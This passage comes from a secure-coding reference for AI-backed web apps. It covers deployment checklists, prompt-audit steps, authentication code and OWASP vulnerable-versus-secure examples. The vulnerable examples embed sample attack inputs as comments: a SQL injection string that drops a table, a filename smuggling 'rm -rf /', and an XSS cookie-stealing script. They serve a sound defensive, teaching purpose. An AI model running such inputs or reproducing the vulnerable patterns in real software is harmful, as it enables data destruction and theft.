  • Log suspicious activity (multiple failed attempts)
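
A sketch of one structured audit event, in the structlog style used elsewhere in this skill (event and field names are illustrative):

import structlog

logger = structlog.get_logger()

def log_auth_event(event: str, ctx: RequestContext, **fields) -> None:
    # One structured event per attempt; never log passwords or raw tokens
    logger.info(
        event,
        user_id=str(ctx.user_id),
        tenant_id=str(ctx.tenant_id),
        request_id=ctx.request_id,
        **fields,
    )

# Usage: log_auth_event("login_failed", ctx, reason="bad_password")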

Review Checklist

Before deployment:

  • No hardcoded secrets in code
  • Secrets in environment variables
  • HTTPS enforced everywhere
  • Rate limiting configured
  • Audit logging enabled
  • Password hashing uses Argon2id or bcrypt
  • Token lifetimes appropriate
  • MFA available

Common Vulnerabilities to Avoid

  • No password in URL parameters
  • No session ID in URL
  • No sensitive data in JWT payload
  • No implicit OAuth grant
  • No predictable session IDs
  • No client-side token storage in localStorage

Pre-Deployment Security Checklist

Before deploying any AI feature, verify all 8 layers:

Layer 0: Edge Protection

  • WAF rules active for OWASP Top 10
  • Rate limiting configured per user/IP
  • DDoS protection enabled
  • HTTPS enforced (no HTTP)

Layer 1: Gateway / Authentication

  • JWT validation active
  • Token expiry enforced
  • RequestContext created from JWT (not user input)
  • Permissions extracted from token

Layer 2: Input Validation

  • Pydantic/Zod models for all request bodies
  • Size limits on all inputs
  • PII detection on user-provided content
  • Injection pattern detection (SQL, XSS, prompt)

Layer 3: Authorization

  • Every endpoint has authorization check
  • RBAC/ABAC policies defined
  • Cross-tenant access blocked
  • Resource-level access verified

Layer 4: Data Access

  • All queries use parameterized values (no f-strings)
  • All queries include tenant_id filter
  • Repository pattern enforces tenant scope
  • Vector search includes tenant filter

Layer 5: LLM Orchestration

  • No user_id in prompts
  • No tenant_id in prompts
  • No analysis_id in prompts
  • No document_id in prompts
  • No UUIDs in prompts
  • Prompt audit check passes

Layer 6: Output Validation

  • LLM output parsed with schema
  • Content guardrails active (toxicity, PII)
  • Hallucination detection for critical fields
  • Output size limits enforced

Layer 7: Attribution & Storage

  • Attribution uses RequestContext (not LLM output)
  • Source references from pre-LLM lookup
  • Audit event logged
  • Data encrypted at rest

Layer 8: Observability

  • Structured logging active
  • Sensitive data redacted from logs
  • Langfuse tracing enabled
  • Metrics exported (latency, errors, tokens)
  • Alerts configured for anomalies

Quick Verification Commands

# Check for IDs in prompt templates
grep -rn "user_id\|tenant_id\|analysis_id\|document_id" backend/app/**/prompts/

# Check for raw SQL (should use parameterized)
grep -rn "f\"SELECT\|f'SELECT" backend/app/

# Check for missing tenant filter
grep -rn "SELECT.*FROM" backend/app/ | grep -v "tenant_id"

# Run security linter
poetry run bandit -r backend/app/ -f json

# Check for hardcoded secrets
grep -rn "api_key\s*=\s*['\"]" backend/

Sign-off required before merge:

  • Developer self-review
  • Security checklist verified
  • Code reviewer approved
  • CI/CD security scans pass

Pre-LLM Call Checklist

Before ANY LLM Call in OrchestKit

Use this checklist before sending any prompt to an LLM:

Phase 1: Context Available

  • RequestContext obtained from JWT (not user input)
  • user_id available in context
  • tenant_id available in context
  • trace_id set for observability

Phase 2: Data Isolation

  • Query includes WHERE tenant_id = :tenant_id
  • Query includes WHERE user_id = :user_id (if user-scoped)
  • Vector search filtered by tenant
  • Full-text search filtered by tenant

Phase 3: Source References Captured

  • document_ids saved for attribution
  • chunk_ids saved for attribution
  • Retrieval timestamp recorded
  • Similarity scores captured (for debugging)

Phase 4: Content Extraction

  • Only content text extracted (no metadata with IDs)
  • Content stripped of any embedded UUIDs
  • Content stripped of any ID field names

Phase 5: Prompt Building

  • Prompt contains ONLY content text
  • No user_id in prompt
  • No tenant_id in prompt
  • No analysis_id in prompt
  • No document_id in prompt
  • No UUIDs in prompt
  • No API keys or secrets in prompt

Phase 6: Prompt Audit

  • audit_prompt() called on final prompt
  • No critical violations detected
  • Warnings logged for review

Phase 7: LLM Call

  • Timeout configured
  • Error handling in place
  • Response parsing ready
  • Langfuse trace started

Quick Verification Script

from llm_safety import audit_prompt, has_critical_violations

def verify_llm_ready(
    prompt: str,
    ctx: RequestContext,
    source_refs: SourceReference,
) -> bool:
    """Quick verification before LLM call"""

    # Check context
    assert ctx.user_id is not None, "Missing user_id"
    assert ctx.tenant_id is not None, "Missing tenant_id"

    # Check source refs captured
    assert len(source_refs.document_ids) > 0, "Source refs not captured"

    # Audit prompt
    violations = audit_prompt(prompt)
    if has_critical_violations(violations):
        raise PromptSecurityError(violations)

    return True

Post-LLM Attribution Checklist

After LLM returns:

  • Output parsed with schema validation
  • Output checked for hallucinated IDs (see the sketch after this checklist)
  • Output checked for grounding
  • Content safety validated
  • Attribution attached from RequestContext
  • Source links created from captured refs
  • Audit event logged
  • Langfuse trace completed

Sign-off: Run verify_llm_ready() before every LLM call

LLM Safety Checklist

Input Safety

  • Validate input length
  • Detect prompt injection attempts
  • Sanitize user content
  • Rate limit requests

Output Safety

  • Content filtering
  • PII detection and redaction
  • Harmful content detection
  • Bias monitoring

System Prompts

  • Clear boundaries
  • Role definition
  • Refusal instructions
  • No secrets in prompts

Guardrails

  • Input guardrails
  • Output guardrails
  • Topic restrictions
  • Sensitive content handling

Monitoring

  • Log flagged content
  • Alert on violations
  • Human review queue
  • Incident response plan

Input Validation Checklist

Core Principles

  • Never trust user input - validate everything
  • Validate server-side - client-side is UX only
  • Use allowlists - not blocklists
  • Validate type, length, format, range
  • Sanitize output - escape when rendering

Schema Definition

  • Define schema for all API endpoints
  • Use strict types (no any)
  • Set reasonable min/max lengths
  • Use enums for fixed value sets
  • Add custom error messages
  • Handle optional vs required properly

String Validation

  • Trim whitespace where appropriate
  • Set maximum length (prevent DoS)
  • Use regex for format validation
  • Escape HTML for display
  • Validate email with proper regex
  • Validate URLs against allowlist domains

Number Validation

  • Use integer for IDs
  • Set min/max bounds
  • Handle NaN and Infinity
  • Use coercion for query params

File Validation

  • Check file extension
  • Validate MIME type
  • Verify magic bytes (actual content; see the sketch after this list)
  • Set maximum file size
  • Scan for malware (production)
  • Generate new filename (no user input)
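
A Python counterpart to the TypeScript magic-byte check shown later in this skill (a sketch; extend the table for the types you accept):

MAGIC_BYTES = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG": "image/png",
    b"%PDF": "application/pdf",
}

def sniff_mime(head: bytes) -> str | None:
    # Compare actual file content, never the client-supplied extension
    for magic, mime in MAGIC_BYTES.items():
        if head.startswith(magic):
            return mime
    return None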

Database Query Safety

  • Use parameterized queries
  • Allowlist sort columns
  • Validate pagination limits
  • Escape identifiers if dynamic

Error Messages

  • Generic errors for users
  • Detailed errors in logs only
  • Don't reveal system internals
  • Don't reveal valid usernames/emails

Validation Libraries

TypeScript/JavaScript

import { z } from 'zod';
import { zodResolver } from '@hookform/resolvers/zod';
import DOMPurify from 'dompurify';

Python

from pydantic import BaseModel, EmailStr, Field
from markupsafe import escape

Common Patterns

Allowlist (✅ Do)

const allowed = ['name', 'email', 'createdAt'];
if (!allowed.includes(sortColumn)) throw new Error('Invalid');

Blocklist (❌ Don't)

const blocked = ['password', 'secret'];
if (blocked.includes(field)) throw new Error('Invalid');
// Problem: Forgets to block new sensitive fields

Type Coercion

  • Use z.coerce.* for query parameters
  • Handle empty strings appropriately
  • Consider timezone for dates
  • Parse numbers from strings safely

Async Validation

  • Use for uniqueness checks (email, username)
  • Rate limit async validations
  • Cache validation results where appropriate
  • Handle race conditions

Security Headers

Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block

Review Checklist

Before PR:

  • All endpoints have input validation
  • Server-side validation implemented
  • Allowlists used instead of blocklists
  • Error messages don't leak info
  • File uploads validate content, not just extension
  • SQL queries use parameterized statements
  • HTML output is escaped
  • Maximum lengths set on all strings

Common Vulnerabilities to Prevent

Vulnerability   | Prevention
SQL Injection   | Parameterized queries
XSS             | HTML escaping, CSP
Path Traversal  | Validate/sanitize paths
SSRF            | URL allowlist
ReDoS           | Avoid complex regex
Buffer Overflow | Length limits

Examples (3)

Authentication Implementation Examples

Password Hashing (Argon2id)

from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError

ph = PasswordHasher(
    time_cost=3,        # Number of iterations
    memory_cost=65536,  # 64 MB
    parallelism=4,      # Number of threads
)

def hash_password(password: str) -> str:
    """Hash password with Argon2id."""
    return ph.hash(password)

def verify_password(password_hash: str, password: str) -> bool:
    """Verify password against hash."""
    try:
        ph.verify(password_hash, password)
        return True
    except VerifyMismatchError:
        return False

# Check if rehash needed (parameters changed)
def needs_rehash(password_hash: str) -> bool:
    return ph.check_needs_rehash(password_hash)

JWT Access Token

import os

import jwt
from datetime import datetime, timedelta, timezone

SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15

def create_access_token(user_id: str, roles: list[str] | None = None) -> str:
    """Create short-lived access token."""
    now = datetime.now(timezone.utc)
    payload = {
        "sub": user_id,
        "type": "access",
        "roles": roles or [],
        "iat": now,
        "exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
    }
    return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)

def verify_access_token(token: str) -> dict | None:
    """Verify and decode access token."""
    try:
        payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
        if payload.get("type") != "access":
            return None
        return payload
    except jwt.ExpiredSignatureError:
        return None
    except jwt.InvalidTokenError:
        return None

Session Management

import os
from datetime import datetime, timedelta, timezone
from flask import Flask, session, request, redirect, render_template

app = Flask(__name__)

# Secure session configuration
app.config.update(
    SECRET_KEY=os.environ["SESSION_SECRET"],
    SESSION_COOKIE_SECURE=True,       # HTTPS only
    SESSION_COOKIE_HTTPONLY=True,     # No JavaScript access
    SESSION_COOKIE_SAMESITE='Strict', # CSRF protection
    PERMANENT_SESSION_LIFETIME=timedelta(hours=1),
)

@app.route('/login', methods=['POST'])
def login():
    user = authenticate(request.form['email'], request.form['password'])
    if user:
        session.permanent = True
        session['user_id'] = user.id
        session['created_at'] = datetime.now(timezone.utc).isoformat()
        return redirect('/dashboard')
    return render_template('login.html', error='Invalid credentials')

@app.route('/logout', methods=['POST'])
def logout():
    session.clear()
    return redirect('/login')

Rate Limiting

from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(
    app,
    key_func=get_remote_address,
    default_limits=["200 per day", "50 per hour"],
    storage_uri="redis://localhost:6379",
)

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")  # Strict rate limit for login
def login():
    # Login logic
    pass

@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour")  # Very strict for password reset
def password_reset():
    # Always return success (don't reveal if email exists)
    return {"message": "If email exists, reset link sent"}

Role-Based Access Control

from functools import wraps
from flask import abort, g

def require_role(*roles):
    """Decorator to require specific role(s)."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not any(role in g.current_user.roles for role in roles):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

def require_permission(permission: str):
    """Decorator to require specific permission."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not g.current_user.has_permission(permission):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
    return get_all_users()

@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
    return get_patient_by_id(id)

Multi-Factor Authentication (TOTP)

import pyotp
import qrcode
from io import BytesIO
import base64

def generate_totp_secret() -> str:
    """Generate new TOTP secret for user."""
    return pyotp.random_base32()

def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
    """Get provisioning URI for authenticator app."""
    totp = pyotp.TOTP(secret)
    return totp.provisioning_uri(name=email, issuer_name=issuer)

def get_totp_qr_code(provisioning_uri: str) -> str:
    """Generate QR code as base64 image."""
    qr = qrcode.QRCode(version=1, box_size=10, border=5)
    qr.add_data(provisioning_uri)
    qr.make(fit=True)
    
    img = qr.make_image(fill_color="black", back_color="white")
    buffer = BytesIO()
    img.save(buffer, format="PNG")
    
    return base64.b64encode(buffer.getvalue()).decode()

def verify_totp(secret: str, code: str) -> bool:
    """Verify TOTP code."""
    totp = pyotp.TOTP(secret)
    return totp.verify(code, valid_window=1)  # Allow 1 period window

# Usage
@app.route('/api/auth/mfa/setup', methods=['POST'])
@login_required
def setup_mfa():
    secret = generate_totp_secret()
    uri = get_totp_provisioning_uri(secret, g.current_user.email)
    qr = get_totp_qr_code(uri)
    
    # Store secret temporarily until verified
    session['pending_mfa_secret'] = secret
    
    return {"qr_code": qr, "secret": secret}

@app.route('/api/auth/mfa/verify', methods=['POST'])
@login_required
def verify_mfa_setup():
    code = request.json['code']
    secret = session.get('pending_mfa_secret')
    
    if verify_totp(secret, code):
        g.current_user.mfa_secret = secret
        g.current_user.mfa_enabled = True
        db.session.commit()
        return {"success": True}
    
    return {"error": "Invalid code"}, 400

Complete Login Flow with MFA

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
    email = request.json.get('email')
    password = request.json.get('password')
    
    user = User.query.filter_by(email=email).first()
    
    # Don't reveal if user exists
    if not user or not verify_password(user.password_hash, password):
        return {"error": "Invalid credentials"}, 401
    
    # Check if MFA required
    if user.mfa_enabled:
        # Create temporary token for MFA step
        mfa_token = create_mfa_pending_token(user.id)
        return {"mfa_required": True, "mfa_token": mfa_token}
    
    # No MFA - issue tokens
    return issue_tokens(user)

@app.route('/api/auth/mfa', methods=['POST'])
@limiter.limit("5 per minute")
def verify_mfa():
    mfa_token = request.json.get('mfa_token')
    code = request.json.get('code')
    
    # Verify MFA pending token
    user_id = verify_mfa_pending_token(mfa_token)
    if not user_id:
        return {"error": "Invalid or expired MFA token"}, 401
    
    user = User.query.get(user_id)
    
    # Verify TOTP code
    if not verify_totp(user.mfa_secret, code):
        return {"error": "Invalid MFA code"}, 401
    
    return issue_tokens(user)

def issue_tokens(user):
    """Issue access and refresh tokens."""
    access_token = create_access_token(user.id, user.roles)
    refresh_token = create_refresh_token(user.id)
    
    return {
        "access_token": access_token,
        "refresh_token": refresh_token,
        "token_type": "Bearer",
        "expires_in": ACCESS_TOKEN_EXPIRE_MINUTES * 60,
    }

OWASP Top 10 - Vulnerable vs Secure Code

Real examples showing vulnerable code and their secure alternatives.

A01: Broken Access Control

❌ Vulnerable: Direct Object Reference

@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
    # Anyone can access any document by guessing IDs
    return db.query(Document).get(doc_id)

✅ Secure: Authorization Check

@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
    doc = db.query(Document).get(doc_id)
    if doc.owner_id != current_user.id and not current_user.is_admin:
        raise HTTPException(403, "Access denied")
    return doc

A02: Cryptographic Failures

❌ Vulnerable: Weak Hashing

import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()

✅ Secure: Modern Password Hashing

from passlib.hash import argon2
password_hash = argon2.hash(password)
# Verify: argon2.verify(password, password_hash)

A03: Injection

❌ Vulnerable: SQL Injection

query = f"SELECT * FROM users WHERE name = '{name}'"
cursor.execute(query)  # name = "'; DROP TABLE users; --"

✅ Secure: Parameterized Query

cursor.execute("SELECT * FROM users WHERE name = %s", (name,))
# Or with ORM:
db.query(User).filter(User.name == name).first()

❌ Vulnerable: Command Injection

import os
os.system(f"convert {filename} output.png")  # filename = "; rm -rf /"

✅ Secure: Use subprocess with list args

import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)

A05: Security Misconfiguration

❌ Vulnerable: Debug in Production

app = Flask(__name__)
app.run(debug=True)  # Exposes debugger, allows code execution

✅ Secure: Environment-based Config

app = Flask(__name__)
app.run(debug=os.getenv("FLASK_ENV") == "development")

❌ Vulnerable: CORS Allow All

CORS(app, origins="*", allow_credentials=True)

✅ Secure: Explicit Origins

CORS(app, origins=["https://app.example.com"], allow_credentials=True)

A07: XSS (Cross-Site Scripting)

❌ Vulnerable: Unescaped Output

element.innerHTML = userInput;  // userInput = "<script>stealCookies()</script>"

✅ Secure: Text Content or Sanitization

element.textContent = userInput;  // Automatically escaped
// Or with sanitization:
element.innerHTML = DOMPurify.sanitize(userInput);

React (Safe by Default)

// ✅ Safe - React escapes by default
<div>{userInput}</div>

// ❌ Dangerous - explicitly bypasses escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />

A08: Insecure Deserialization

❌ Vulnerable: Pickle from Untrusted Source

import pickle
data = pickle.loads(user_input)  # Can execute arbitrary code

✅ Secure: Use JSON

import json
data = json.loads(user_input)  # Only parses data, no code execution

Quick Reference

Vulnerability   | Fix
SQL Injection   | Parameterized queries, ORM
XSS             | Escape output, CSP headers
CSRF            | CSRF tokens, SameSite cookies
Auth bypass     | Check permissions every request
Secrets in code | Environment variables, vault
Weak crypto     | Argon2/bcrypt, TLS 1.3, AES-256-GCM

Input Validation Patterns

API Request Validation (TypeScript)

import { z } from 'zod';

// Request body schema
const CreateUserSchema = z.object({
  email: z.string().email(),
  password: z.string().min(8).max(100),
  name: z.string().min(2).max(100).transform(s => s.trim()),
  role: z.enum(['user', 'admin']).default('user'),
  metadata: z.record(z.string()).optional(),
});

type CreateUserRequest = z.infer<typeof CreateUserSchema>;

// Express middleware
function validateBody<T extends z.ZodSchema>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Validation failed',
        details: result.error.flatten().fieldErrors,
      });
    }
    req.body = result.data;
    next();
  };
}

// Usage
app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
  const user = req.body as CreateUserRequest;
  // user is fully typed and validated
});

Query Parameter Validation

const PaginationSchema = z.object({
  page: z.coerce.number().int().positive().default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
  order: z.enum(['asc', 'desc']).default('desc'),
});

function validateQuery<T extends z.ZodSchema>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.query);
    if (!result.success) {
      return res.status(400).json({
        error: 'Invalid query parameters',
        details: result.error.flatten().fieldErrors,
      });
    }
    req.query = result.data;
    next();
  };
}

app.get('/api/users', validateQuery(PaginationSchema), (req, res) => {
  const { page, limit, sort, order } = req.query;
  // All values are properly typed and defaulted
});

Discriminated Union for Polymorphic Data

const NotificationSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('email'),
    email: z.string().email(),
    subject: z.string().min(1),
    body: z.string().min(1),
  }),
  z.object({
    type: z.literal('sms'),
    phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
    message: z.string().max(160),
  }),
  z.object({
    type: z.literal('push'),
    deviceToken: z.string().min(1),
    title: z.string().max(50),
    body: z.string().max(200),
  }),
]);

type Notification = z.infer<typeof NotificationSchema>;

// Type-safe handling
function sendNotification(notification: Notification) {
  switch (notification.type) {
    case 'email':
      return sendEmail(notification.email, notification.subject, notification.body);
    case 'sms':
      return sendSMS(notification.phone, notification.message);
    case 'push':
      return sendPush(notification.deviceToken, notification.title, notification.body);
  }
}

Allowlist Validation

// Only allow specific values
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);

// For dynamic allowlists
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
  return z.enum(allowed as [T, ...T[]]);
}

const allowedColumns = ['name', 'email', 'createdAt'] as const;
const DynamicSortSchema = createAllowlistSchema(allowedColumns);

File Upload Validation

const FileUploadSchema = z.object({
  file: z.object({
    name: z.string(),
    type: z.enum(['image/jpeg', 'image/png', 'image/webp', 'application/pdf']),
    size: z.number().max(5 * 1024 * 1024, 'File must be under 5MB'),
  }),
});

// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
  'image/jpeg': [0xFF, 0xD8, 0xFF],
  'image/png': [0x89, 0x50, 0x4E, 0x47],
  'image/webp': [0x52, 0x49, 0x46, 0x46],
  'application/pdf': [0x25, 0x50, 0x44, 0x46],
};

function validateFileContent(buffer: Buffer, mimeType: string): boolean {
  const expected = imageMagicBytes[mimeType];
  if (!expected) return false;
  return expected.every((byte, i) => buffer[i] === byte);
}

URL Validation with Domain Allowlist

const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;

const UrlSchema = z.string()
  .url()
  .refine(
    (url) => {
      const { hostname, protocol } = new URL(url);
      return protocol === 'https:' && ALLOWED_DOMAINS.includes(hostname as any);
    },
    { message: 'URL must be HTTPS and from allowed domains' }
  );

// Usage
UrlSchema.parse('https://api.example.com/data'); // OK
UrlSchema.parse('https://evil.com/data');        // Error
UrlSchema.parse('http://api.example.com/data');  // Error (not HTTPS)

Python (Pydantic) Validation

from pydantic import BaseModel, EmailStr, Field, field_validator
from typing import Literal, Union

# Basic model
class UserCreate(BaseModel):
    email: EmailStr
    name: str = Field(min_length=2, max_length=100)
    age: int = Field(ge=0, le=150)
    
    @field_validator('name')
    @classmethod
    def strip_and_title(cls, v: str) -> str:
        return v.strip().title()

# Discriminated union
class EmailNotification(BaseModel):
    type: Literal['email']
    email: EmailStr
    subject: str
    body: str

class SMSNotification(BaseModel):
    type: Literal['sms']
    phone: str
    message: str = Field(max_length=160)

Notification = Annotated[
    Union[EmailNotification, SMSNotification],
    Field(discriminator='type'),
]

# Allowlist validation
ALLOWED_COLUMNS = frozenset(['name', 'email', 'created_at'])

def validate_sort_column(column: str) -> str:
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"Invalid sort column: {column}")
    return column

HTML Sanitization

from flask import request
from markupsafe import escape

@app.route('/comment', methods=['POST'])
def create_comment():
    # Escape HTML to prevent stored XSS
    content = escape(request.form['content'])
    db.execute("INSERT INTO comments (content) VALUES (?)", [content])
    return {'status': 'created'}, 201

import DOMPurify from 'dompurify';

// Sanitize HTML input
const sanitizedHtml = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href'],
});
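The dompurify import above works as-is in the browser; in Node it needs a DOM implementation. A common setup pairs it with jsdom, sketched here assuming both packages are installed:

import { JSDOM } from 'jsdom';
import createDOMPurify from 'dompurify';

const { window } = new JSDOM('');
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize('<a href="/profile" onclick="steal()">me</a><script>bad()</script>');
// Result: '<a href="/profile">me</a>' (script tags and event handlers stripped)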

Form Validation with React Hook Form

import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';

const SignupSchema = z.object({
  email: z.string().email('Invalid email'),
  password: z.string()
    .min(8, 'Password must be at least 8 characters')
    .regex(/[A-Z]/, 'Must contain uppercase')
    .regex(/[0-9]/, 'Must contain number'),
  confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
  message: "Passwords don't match",
  path: ['confirmPassword'],
});

type SignupForm = z.infer<typeof SignupSchema>;

function SignupForm() {
  const { register, handleSubmit, formState: { errors } } = useForm<SignupForm>({
    resolver: zodResolver(SignupSchema),
  });

  const onSubmit = (data: SignupForm) => {
    // Data is fully validated here; send it to the API
  };

  return (
    <form onSubmit={handleSubmit(onSubmit)}>
      <input {...register('email')} placeholder="Email" />
      {errors.email && <span className="error">{errors.email.message}</span>}
      
      <input {...register('password')} type="password" placeholder="Password" />
      {errors.password && <span className="error">{errors.password.message}</span>}
      
      <input {...register('confirmPassword')} type="password" placeholder="Confirm" />
      {errors.confirmPassword && <span className="error">{errors.confirmPassword.message}</span>}
      
      <button type="submit">Sign Up</button>
    </form>
  );
}